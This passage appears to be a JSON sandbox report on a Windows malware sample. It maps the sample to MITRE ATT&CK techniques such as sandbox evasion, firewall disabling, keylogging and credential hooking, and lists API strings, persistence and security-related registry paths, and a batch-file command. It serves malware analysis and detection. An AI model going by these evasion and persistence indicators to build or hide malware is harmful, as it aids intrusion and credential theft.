"technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 2, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Services File Permissions Weakness", "attck_id": "T1574.010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/010", "malicious_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 19}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "informative_identifiers_count": 2, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 3}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "string-345", "type": 2, "relevance": 1, "name": "Contains ability to disable/close registry key (API string)", "description": "Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"RegCloseKey\" (Indicator: \"RegCloseKey\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-204", "type": 2, "relevance": 1, "name": "Contains ability to create a new process (API string)", "description": "Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"CreateProcessA\" (Indicator: \"CreateProcess\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-315", "type": 2, "relevance": 1, "name": "Contains ability to create/open files (API string)", "description": "Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"DCC error: CreateFile() failed\" (Indicator: \"CreateFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"DCC error: CreateFile() failed\" (Indicator: \"CreateFile\"; Source: \"00000000-00004816.00000000.139125.0041B000.00000080.mdmp\")\n Found reference to API \"CreateFileA\" (Indicator: \"CreateFile\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-240", "type": 2, "relevance": 1, "name": "Contains ability to execute an application (API string)", "description": "Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API \"ShellExecuteA\" (Indicator: \"ShellExecute\"; Source: \"00000000-00005072.00000000.139283.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-120", "type": 2, "relevance": 1, "name": "Contains registry location strings", "description": "\"Software\\Microsoft\\Connect\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\MessengerService\\ListCache\\.NET Messenger Service\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Internet Explorer\\TypedURLs\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Internet Explorer\\Main\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Internet Explorer\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Kazaa\\UserDetails\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices-\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run-\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"SOFTWARE\\VMware, Inc.\\VMware Tools\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"SOFTWARE\\Microsoft\\Security Center\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\\" in Source: 0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\n \"Software\\Policies\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00004816.00000000.139125.001D0000.00000004.mdmp\n \"Software\\Microsoft\\MessengerService\\ListCache\\.NET Messenger Service\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Internet Explorer\\TypedURLs\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Internet Explorer\\Main\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Internet Explorer\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Kazaa\\UserDetails\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRun\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\RunServices-\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Run-\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" in Source: 00000000-00004816.00000000.139125.0041B000.00000080.mdmp\n \"SOFTWARE\\VMware, Inc.\\VMware Tools\" in Source: 00000000-00004816.00000000.139125.00423000.00000040.mdmp\n \"SOFTWARE\\Microsoft\\Security Center\" in Source: 00000000-00004816.00000000.139125.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" in Source: 00000000-00004816.00000000.139125.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" in Source: 00000000-00004816.00000000.139125.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" in Source: 00000000-00004816.00000000.139125.00423000.00000040.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\\" in Source: 00000000-00004816.00000000.139125.00423000.00000040.mdmp\n \"Software\\Microsoft\\Connect\" in Source: 00000000-00005072.00000000.139283.0041A000.00000040.mdmp\n \"SOFTWARE\\VMware, Inc.\\VMware Tools\" in Source: 00000000-00005072.00000000.139289.00423000.00000040.mdmp\n \"SOFTWARE\\Microsoft\\Security Center\" in Source: 00000000-00005072.00000000.139289.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\wscsvc\" in Source: 00000000-00005072.00000000.139289.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\DomainProfile\" in Source: 00000000-00005072.00000000.139289.00423000.00000040.mdmp\n \"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\" in Source: 00000000-00005072.00000000.139289.00423000.00000040.mdmp\n \"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\\" in Source: 00000000-00005072.00000000.139289.00423000.00000040.mdmp", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-423", "type": 2, "relevance": 1, "name": "Contains ability to create directories (API string)", "description": "Found reference to API \"10965118767,4552,3132,,CreateDirectoryW,kernel32.dll,\"252:21:44.348\",RX=0,PX=0\" (Indicator: \"CreateDirectory\"; Source: \"00000000-00004816.00000000.139125.001D0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-174", "type": 2, "relevance": 1, "name": "Contains ability to executes commands or batch file", "description": "Found string \"indows\\system32\\cmd.exe /c \"\"C:\\Users\\HAPUBWS\\AppData\\Local\\Temp\\r2767.bat\" \"\" (Indicator: \"\\system32\\cmd.exe /c \"; Source: \"00000000-00004816.00000001.139308.0026A000.00000004.mdmp\")\n Found string \"indows\\system32\\cmd.exe /c \"\"C:\\Users\\HAPUBWS\\AppData\\Local\\Temp\\r2767.bat\" \"\" (Indicator: \"cmd.exe /c\"; Source: \"00000000-00004816.00000001.139308.0026A000.00000004.mdmp\")\n Found string \"indows\\system32\\cmd.exe /c\" (Indicator: \"cmd.exe /c\"; Source: \"00000000-00004816.00000001.139308.0026A000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-101", "type": 2, "relevance": 1, "name": "Contains ability to execute Windows APIs", "description": "Found reference to API (Indicator: \"RegDeleteKeyA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CloseServiceHandle\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"LookupPrivilegeValueA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"RegCloseKey\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"OpenProcessToken\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetUserNameA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"CloseEventLog\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"QueryServiceStatus\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"RegQueryValueExA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"OpenEventLogA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"RegSetValueExA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"AdjustTokenPrivileges\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"ControlService\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"RegOpenKeyExA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"RegDeleteValueA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"RegCreateKeyExA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"DeleteService\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"OpenSCManagerA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"OpenServiceA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"EnumDependentServicesA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetSystemTime\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetLastError\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"HeapFree\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetStdHandle\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"LCMapStringW\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"ReadFile\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"SetHandleCount\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"LoadLibraryA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetFileAttributesA\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetFileTime\"; File: \"0b84aeb616ebd3b443326c397a9b3841124298b9a87ce91cd802d84fc6826a16\")\n Found reference to API (Indicator: \"GetOEMCP\"; File: 